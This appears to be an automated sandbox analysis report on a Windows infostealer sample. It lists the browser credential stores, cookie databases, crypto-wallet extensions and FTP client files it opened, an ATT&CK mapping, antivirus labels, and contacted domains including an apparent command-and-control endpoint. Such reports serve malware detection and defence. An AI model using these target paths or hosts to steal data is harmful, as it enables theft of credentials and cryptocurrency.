              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe, Directory queried: C:\Users\user\Documents
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe, Directory queried: C:\Users\user\Documents\AQRFEVRTGL
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe, Directory queried: C:\Users\user\Documents\BXAJUJAOEO
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe, Directory queried: C:\Users\user\Documents\CZQKSDDMWR
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe, Directory queried: C:\Users\user\Documents\DQOFHVHTMG
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe, Directory queried: C:\Users\user\Documents\HMPPSXQPQV
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe, Directory queried: C:\Users\user\Documents\NWCXBPIUYI
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe, Directory queried: number of queries: 1001
              Source: Yara match, File source: Process Memory Space: NAliwxUTJ4.exe PID: 828, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match, File source: Process Memory Space: NAliwxUTJ4.exe PID: 828, type: MEMORYSTR
              Source: Yara match, File source: sslproxydump.pcap, type: PCAP
              Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
              MITRE ATT&CK Matrix (techniques listed per tactic; techniques matched by this analysis carry their count in parentheses)

              Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
              Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
              Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
              Execution: Windows Management Instrumentation (2), PowerShell (1), At, Cron, Launchd, Scheduled Task
              Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
              Privilege Escalation: Process Injection (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
              Defense Evasion: Virtualization/Sandbox Evasion (34), Process Injection (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Software Packing (12), DLL Side-Loading (1)
              Credential Access: OS Credential Dumping (2), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
              Discovery: Query Registry (1), Security Software Discovery (751), Virtualization/Sandbox Evasion (34), Process Discovery (2), File and Directory Discovery (2), System Information Discovery (223)
              Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
              Collection: Archive Collected Data (1), Data from Local System (41), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
              Command and Control: Encrypted Channel (11), Non-Application Layer Protocol (2), Application Layer Protocol (113), Protocol Impersonation, Fallback Channels, Multiband Communication
              Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
              Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop
              Antivirus detections (Source, Detection, Scanner, Label)
              Source: NAliwxUTJ4.exe, Detection: 61%, Scanner: ReversingLabs, Label: Win32.Trojan.Symmi
              Source: NAliwxUTJ4.exe, Detection: 100%, Scanner: Avira, Label: TR/Crypt.XPACK.Gen
              Source: NAliwxUTJ4.exe, Detection: 100%, Scanner: Joe Sandbox ML
              No Antivirus matches
              Domains (Name, IP, Active, Malicious, Reputation)
              Name: discokeyus.lat, IP: 104.21.21.99, Active: true, Malicious: false, Reputation: high
              Name: grannyejh.lat, IP: unknown, Active: unknown, Malicious: false, Reputation: high
              Name: sweepyribs.lat, IP: unknown, Active: unknown, Malicious: false, Reputation: high

              Contacted URLs (Name, Malicious, Reputation)
              Name: https://discokeyus.lat/api, Malicious: false, Reputation: high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://discokeyus.lat/q_2NAliwxUTJ4.exe, 00000001.00000003.2647853138.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2648239743.0000000000EDA000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://duckduckgo.com/chrome_newtabNAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://discokeyus.lat/g$NAliwxUTJ4.exe, 00000001.00000003.2560626361.0000000000E58000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://duckduckgo.com/ac/?q=NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoNAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiNAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://crl.rootca1.amazontrust.com/rootca1.crl0NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
Name: https://discokeyus.lat/apiu
Source: NAliwxUTJ4.exe, 00000001.00000003.2647901427.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2639237104.00000000054AF000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://discokeyus.lat/apiak
Source: NAliwxUTJ4.exe, 00000001.00000003.2669781908.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: http://ocsp.rootca1.amazontrust.com0:
Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://www.ecosia.org/newtab/
Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: NAliwxUTJ4.exe, 00000001.00000003.2615332629.00000000055C8000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://ac.ecosia.org/autocomplete?q=
Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://crl.micro
Source: NAliwxUTJ4.exe, 00000001.00000003.2648298445.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2560626361.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2647921088.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2673811023.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2560747517.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2669781908.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2687998842.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2688450690.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://x1.c.lencr.org/0
Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://x1.i.lencr.org/0
Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://discokeyus.lat/
Source: NAliwxUTJ4.exe, 00000001.00000003.2669781908.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2669781908.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2647853138.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2560747517.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2726917999.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2560626361.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2648239743.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2687998842.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2688450690.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://discokeyus.lat/J
Source: NAliwxUTJ4.exe, 00000001.00000003.2560626361.0000000000E75000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: https://discokeyus.lat:443/apilat/J
Source: NAliwxUTJ4.exe, 00000001.00000003.2674035293.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2670051008.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2726917999.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000E75000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: https://discokeyus.lat:443/apio
Source: NAliwxUTJ4.exe, 00000001.00000003.2647853138.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2648239743.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: https://discokeyus.lat:443/api
Source: NAliwxUTJ4.exe, 00000001.00000003.2726917999.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000E75000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://support.mozilla.org/products/firefoxgro.all
Source: NAliwxUTJ4.exe, 00000001.00000003.2615332629.00000000055C8000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://www.mozilla.or
Source: NAliwxUTJ4.exe, 00000001.00000003.2616874817.00000000054F3000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

